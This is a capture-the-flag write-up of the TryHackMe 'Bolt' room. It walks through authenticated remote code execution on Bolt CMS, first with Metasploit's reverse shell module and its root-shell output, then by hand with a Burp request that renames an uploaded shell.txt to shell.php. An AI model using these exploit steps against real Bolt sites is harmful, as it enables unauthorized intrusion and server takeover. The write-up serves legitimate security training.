THM - Bolt | An ordinary day

Introduction

This room is designed for users to get familiar with the Bolt CMS and how it can be exploited using Authenticated Remote Code Execution.

Okey dokey then. It’s easy rated. Let’s begin.

Ports

nmap says we’ve got three ports: 22 (SSH) and 80 (HTTP) and 8000. One of the questions is:

What port number has a web server with a CMS running?

so I think we can assume we’re looking for port 8000. Let’s go there.

Port 8000

The page helpfully gives us some creds - I guess this is an exercise in authenticated RCE after all - bolt:boltadmin123

Metasploit

We can exploit this with Metasploit - it’s basically this:

msf5 exploit(unix/webapp/bolt_authenticated_rce) > run

[*] Started reverse TCP handler on 10.9.10.123:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "apyaem".
**etc**
shell
[*] Trying to find binary(python) on target machine
[*] Found python at 
[*] Using `python` to pop up an interactive shell
whoami
root
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash");'
root@bolt:~/public/files# ls -lash
root@bolt:/root# cd /home
cd /home
root@bolt:/home# ls -lash
ls -lash
total 288K
4.0K drwxr-xr-x  3 root root 4.0K Jul 18 19:36 .
4.0K drwxr-xr-x 27 root root 4.0K Jul 18 19:30 ..
4.0K drwxr-xr-x 10 bolt bolt 4.0K Jul 18 20:51 bolt
272K -rw-r--r--  1 root root 272K Jul 18 19:36 composer-setup.php
4.0K -rw-r--r--  1 root root   34 Jul 18 19:33 flag.txt
root@bolt:/home# cat flag.txt
cat flag.txt
**FLAG HERE**

So, that’s pretty easy.

Too Easy

In fact that was too easy, so let’s do it without metasploit. The below is based on this:

Login to bolt with bolt:boltadmin123 at: http://10.10.246.203:8000/bolt/login
Visit view-source:http://10.10.246.203:8000/bolt/overview/showcases and copy the csrf token
Upload a reverse shell with a .txt extension at http://10.10.246.203:8000/bolt/files, eg. shell.txt
Start a netcat listener
Sent this request via Burp, with the appropriate cookie and token values:

POST /async/folder/rename HTTP/1.1
Host: 10.10.246.203:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: bolt_session_4d15e6f652c744dfa859d2603ae24684=9e5fd37dba71affe7ae0febb83; bolt_authtoken_4d15e6f652c744dfa859d2603ae24684=5483a2218991ba3b7b1dec5a6a561ab81d4bc9e26b2168b4cb7501ce84fe24b1
Upgrade-Insecure-Requests: 1
Content-Length: 124
Content-Type: application/x-www-form-urlencoded

namespace=root&parent=public/files&oldname=./shell.txt&newname=./shell.php&token=zLkOX0JJsurkJFpCoIgB1SrZg1y9n_pSedYFHCd0Fp8

Finally, visit http://10.10.246.203:8000/files/shell.php

Boom.